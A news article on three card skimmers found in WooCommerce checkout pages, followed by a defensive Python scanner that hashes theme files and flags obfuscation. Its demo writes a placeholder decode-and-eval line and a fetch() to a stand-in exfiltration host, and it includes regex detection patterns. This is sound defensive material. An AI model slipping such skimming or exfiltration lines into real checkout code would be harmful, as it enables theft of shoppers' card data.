Web administrators overseeing retail sites using the WooCommerce platform should watch for new payment card skimmers that hackers are embedding in checkout pages.
The warning comes from security firm RiskIQ, which this week said it has found three new skimmers targeting e-retailers using the WooCommerce plugin for WordPress. It cited research by Barn2, a software company specializing in WordPress and WooCommerce products, saying WooCommerce represents 29 per cent of the top one million sites using e-commerce technologies, exceeding 5 million active installs of the free plugin as of early 2021.
RiskIQ describes the three new pieces of malicious code as follows:
—The WooTheme Skimmer
This was detected across five domains using a compromised WooCommerce theme. It’s “relatively simplistic and makes its functionality reasonably easy to understand.”
Operators obfuscated the skimming code in all discovered iterations, except one. However, this one instance appears to be in error, as RiskIQ detected the obfuscated skimmer on the same compromised domain before the clear text version appeared.
A separate researcher discovered this same skimmer in July, highlighting similar findings of an exfil domain within the theme’s function.php and the identical destination within the query.slim.js file.
—The Slect Skimmer
Generic skimmers are repeatedly used across the same infrastructure, even by different threat actors, who add unique elements to the skimmer for their specific needs. For RiskIQ, a minor change in a skimmer was enough to classify this one as new. In this case it’s a spelling error of the word “select” in the script, which is also why researchers call it the ‘Slect’ skimmer.
Once the DOM content is fully loaded, the Slect skimmer does two things. It will look for a series of form fields that the skimmer does not want to pull data from, such as open text fields, passwords, and checkboxes. Next, an event listener listens for a click on a button, likely to evade sandboxing by security researchers.
The exfil domain found within the skimmer has been previously associated with other Magecart infrastructure and was identified by RiskIQ researcher Jordan Herman as being used by a variant of the Grelos skimmer.
—The Gateway Skimmer
RiskIQ says this one has multiple layers and steps added by the actor to hide and obfuscate its processes. The skimmer code is “massive and difficult to digest while obfuscated and runs a few unique functions observed in other skimmers.” Across different iterations of this skimmer, the words “gate” and “gateway” appear in its .php and .js files, hence its name.
After peeling back the obfuscation layered over the legitimate code, RiskIQ researchers found a skimmer that they have been detecting since 2019. This skimmer even exfiltrates PII and credit card data to the same C2 domain as that familiar skimmer. “Interestingly,” the report adds, “this WooCommerce version of the Gateway skimmer looks specifically for a Firebug web browser extension (long since discontinued in 2017).”
As for how the sites were compromised, RiskIQ told ITWorldCanada.com it believes that weaknesses exist in the compromised clients’ use of poorly-vetted WooCommerce themes and unaudited third-party code. “This is explicitly true in the WooTheme skimmer, as we can see that the card skimmer is embedded into a malicious theme file, and the Slect and Gateway skimmers are both obfuscated and pasted into legitimate checkout javascript.”
Beyond having robust detections for malware, website operators should regularly inspect their crontab entries for unexpected commands, ensure that file access permissions are correct, and audit access to those files.
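The advice above amounts to two checks a site operator can automate: know what the theme’s PHP and JavaScript files looked like when they were vetted, and look inside them for the kinds of change the three skimmers rely on (an obfuscated payload dropped into a theme PHP file, or a checkout script that now talks to an extra host). The following is an added example written for this article, not code from RiskIQ or WooCommerce. It hashes every .php/.js file in a theme directory to build a baseline, reports files that later change, and flags PHP decode-and-eval constructs and JavaScript references to hosts outside an allowlist. The theme files, the allowed host `shop.example` and the `exfil.example-placeholder` host are all constructed for the demo; the regular expressions are this example’s own choice of indicators and are not a complete detection.

```python
"""Offline integrity and indicator scan for a WordPress/WooCommerce theme directory.

Added example: baseline hashing of theme files plus a search for obfuscation
constructs in PHP and for unexpected external hosts referenced in JavaScript.
All sample files below are constructed for the demo, not taken from any real theme.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# PHP constructs commonly used to hide a payload inside a theme file (assumed indicator list).
PHP_SUSPICIOUS = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
# Any http(s) host referenced from a script; a checkout page should only talk to known hosts.
JS_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
SCANNED_SUFFIXES = {".php", ".js"}


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(theme_dir: Path) -> dict:
    """Record the hash of every .php/.js file, keyed by path relative to the theme root."""
    return {
        p.relative_to(theme_dir).as_posix(): sha256_file(p)
        for p in sorted(theme_dir.rglob("*"))
        if p.is_file() and p.suffix in SCANNED_SUFFIXES
    }


def diff_against_baseline(theme_dir: Path, baseline: dict) -> dict:
    """Return files that changed, appeared or disappeared since the baseline was taken."""
    current = build_baseline(theme_dir)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def scan_file(path: Path, allowed_hosts: set) -> list:
    """Flag obfuscation constructs in PHP and unknown external hosts in JS."""
    text = path.read_text(errors="replace")
    findings = []
    if path.suffix == ".php":
        for m in PHP_SUSPICIOUS.finditer(text):
            findings.append(f"{m.group(1)}() call")
    if path.suffix == ".js":
        for host in sorted({h.lower() for h in JS_HOST.findall(text)}):
            if host not in allowed_hosts:
                findings.append(f"unexpected host {host}")
    return findings


def scan_theme(theme_dir: Path, allowed_hosts: set) -> dict:
    """Map each relative path to its findings; files with no findings are omitted."""
    results = {}
    for p in sorted(theme_dir.rglob("*")):
        if p.is_file() and p.suffix in SCANNED_SUFFIXES:
            findings = scan_file(p, allowed_hosts)
            if findings:
                results[p.relative_to(theme_dir).as_posix()] = findings
    return results


def demo() -> dict:
    """Build a constructed theme, baseline it, then simulate a tampered checkout script."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "shop-theme"
        (theme / "js").mkdir(parents=True)
        # Constructed clean files as they would look after vetting.
        (theme / "functions.php").write_text("<?php add_action('wp_enqueue_scripts', 'shop_assets');\n")
        (theme / "js" / "checkout.js").write_text("fetch('https://shop.example/wc-ajax/checkout');\n")
        baseline = build_baseline(theme)

        # Constructed tampering: a decode-and-eval line in PHP and an extra host in the checkout script.
        (theme / "functions.php").write_text(
            "<?php add_action('wp_enqueue_scripts', 'shop_assets');\n"
            "eval(base64_decode('PLACEHOLDER'));\n"
        )
        with (theme / "js" / "checkout.js").open("a") as fh:
            fh.write("fetch('https://exfil.example-placeholder/collect');\n")

        return {
            "diff": diff_against_baseline(theme, baseline),
            "findings": scan_theme(theme, {"shop.example"}),
        }


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

In practice the baseline would be written to storage outside the web root when a theme is installed or updated, and the diff and scan run from cron (itself one of the things to review) or a file-integrity monitor, with the allowlist populated from the hosts the checkout page legitimately loads from.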